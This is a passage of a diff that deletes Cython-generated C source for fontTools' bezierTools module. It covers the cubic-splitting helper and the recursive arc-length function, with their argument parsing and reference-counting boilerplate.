__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_0_125); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_deriv3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":78 - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( # <<<<<<<<<<<<<< - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":79 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), # <<<<<<<<<<<<<< - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), - * ) - */ - __pyx_t_2 = PyNumber_Add(__pyx_v_p0, __pyx_v_p1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_0_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Subtract(__pyx_v_mid, __pyx_v_deriv3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyTuple_New(4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_p0); - __Pyx_GIVEREF(__pyx_v_p0); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_p0)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_mid); - __Pyx_GIVEREF(__pyx_v_mid); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 3, __pyx_v_mid)) __PYX_ERR(0, 79, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":80 - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_2 = PyNumber_Add(__pyx_v_mid, __pyx_v_deriv3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_v_p2, __pyx_v_p3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_float_0_5); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_mid); - __Pyx_GIVEREF(__pyx_v_mid); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_mid)) __PYX_ERR(0, 80, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_2)) __PYX_ERR(0, 80, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_t_4)) __PYX_ERR(0, 80, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_p3); - __Pyx_GIVEREF(__pyx_v_p3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_p3)) __PYX_ERR(0, 80, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":79 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), # <<<<<<<<<<<<<< - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), - * ) - */ - __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1)) __PYX_ERR(0, 79, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_r = __pyx_t_4; - __pyx_t_4 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_cubic_into_two", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_mid); - __Pyx_XDECREF(__pyx_v_deriv3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse, "_calcCubicArcLengthCRecurse(double mult, double complex p0, double complex p1, double complex p2, double complex p3)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse = {"_calcCubicArcLengthCRecurse", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - double __pyx_v_mult; - __pyx_t_double_complex __pyx_v_p0; - __pyx_t_double_complex __pyx_v_p1; - __pyx_t_double_complex __pyx_v_p2; - __pyx_t_double_complex __pyx_v_p3; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_calcCubicArcLengthCRecurse (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_mult,&__pyx_n_s_p0,&__pyx_n_s_p1,&__pyx_n_s_p2,&__pyx_n_s_p3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_mult)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p0)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, 1); __PYX_ERR(0, 84, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, 2); __PYX_ERR(0, 84, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, 3); __PYX_ERR(0, 84, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, 4); __PYX_ERR(0, 84, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_calcCubicArcLengthCRecurse") < 0)) __PYX_ERR(0, 84, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_mult = __pyx_PyFloat_AsDouble(values[0]); if (unlikely((__pyx_v_mult == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p0 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[4]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 84, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._calcCubicArcLengthCRecurse", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse(__pyx_self, __pyx_v_mult, __pyx_v_p0, __pyx_v_p1, __pyx_v_p2, __pyx_v_p3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse(CYTHON_UNUSED PyObject *__pyx_self, double __pyx_v_mult, __pyx_t_double_complex __pyx_v_p0, __pyx_t_double_complex __pyx_v_p1, __pyx_t_double_complex __pyx_v_p2, __pyx_t_double_complex __pyx_v_p3) { - double __pyx_v_arch; - double __pyx_v_box; - PyObject *__pyx_v_one = NULL; - PyObject *__pyx_v_two = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_t_1; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - PyObject *(*__pyx_t_10)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_calcCubicArcLengthCRecurse", 1); - - /* "fontTools/misc/bezierTools.py":93 - * @cython.locals(mult=cython.double, arch=cython.double, box=cython.double) - * def _calcCubicArcLengthCRecurse(mult, p0, p1, p2, p3): - * arch = abs(p0 - p3) # <<<<<<<<<<<<<< - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: - */ - __pyx_v_arch = __Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p0, __pyx_v_p3)); - - /* "fontTools/misc/bezierTools.py":94 - * def _calcCubicArcLengthCRecurse(mult, p0, p1, p2, p3): - * arch = abs(p0 - p3) - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) # <<<<<<<<<<<<<< - * if arch * mult >= box: - * return (arch + box) * 0.5 - */ - __pyx_v_box = ((__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p0, __pyx_v_p1)) + __Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p1, __pyx_v_p2))) + __Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p2, __pyx_v_p3))); - - /* "fontTools/misc/bezierTools.py":95 - * arch = abs(p0 - p3) - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: # <<<<<<<<<<<<<< - * return (arch + box) * 0.5 - * else: - */ - __pyx_t_1 = ((__pyx_v_arch * __pyx_v_mult) >= __pyx_v_box); - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":96 - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: - * return (arch + box) * 0.5 # <<<<<<<<<<<<<< - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyFloat_FromDouble(((__pyx_v_arch + __pyx_v_box) * 0.5)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 96, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":95 - * arch = abs(p0 - p3) - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: # <<<<<<<<<<<<<< - * return (arch + box) * 0.5 - * else: - */ - } - - /* "fontTools/misc/bezierTools.py":98 - * return (arch + box) * 0.5 - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) # <<<<<<<<<<<<<< - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( - * mult, *two - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_split_cubic_into_two); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_p0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __pyx_PyComplex_FromComplex(__pyx_v_p1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __pyx_PyComplex_FromComplex(__pyx_v_p2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __pyx_PyComplex_FromComplex(__pyx_v_p3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_8, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_9, 4+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 98, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_3 = PyList_GET_ITEM(sequence, 0); - __pyx_t_7 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_7); - #else - __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_10 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_3 = __pyx_t_10(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 1; __pyx_t_7 = __pyx_t_10(__pyx_t_6); if (unlikely(!__pyx_t_7)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_10(__pyx_t_6), 2) < 0) __PYX_ERR(0, 98, __pyx_L1_error) - __pyx_t_10 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_10 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 98, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_v_one = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_two = __pyx_t_7; - __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":99 - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( # <<<<<<<<<<<<<< - * mult, *two - * ) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicArcLengthCRecurse); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_7 = PyFloat_FromDouble(__pyx_v_mult); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_7); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error); - __pyx_t_7 = 0; - __pyx_t_7 = __Pyx_PySequence_Tuple(__pyx_v_one); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_6 = PyNumber_Add(__pyx_t_3, __pyx_t_7); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_6, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_calcCubicArcLengthCRecurse); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - - /* "fontTools/misc/bezierTools.py":100 - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( - * mult, *two # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_2 = PyFloat_FromDouble(__pyx_v_mult); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 100, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":99 - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( # <<<<<<<<<<<<<< - * mult, *two - * ) - */ - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":100 - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( - * mult, *two # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_2 = __Pyx_PySequence_Tuple(__pyx_v_two); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":99 - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( # <<<<<<<<<<<<<< - * mult, *two - * ) - */ - __pyx_t_5 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_t_5, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyNumber_Add(__pyx_t_7, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - 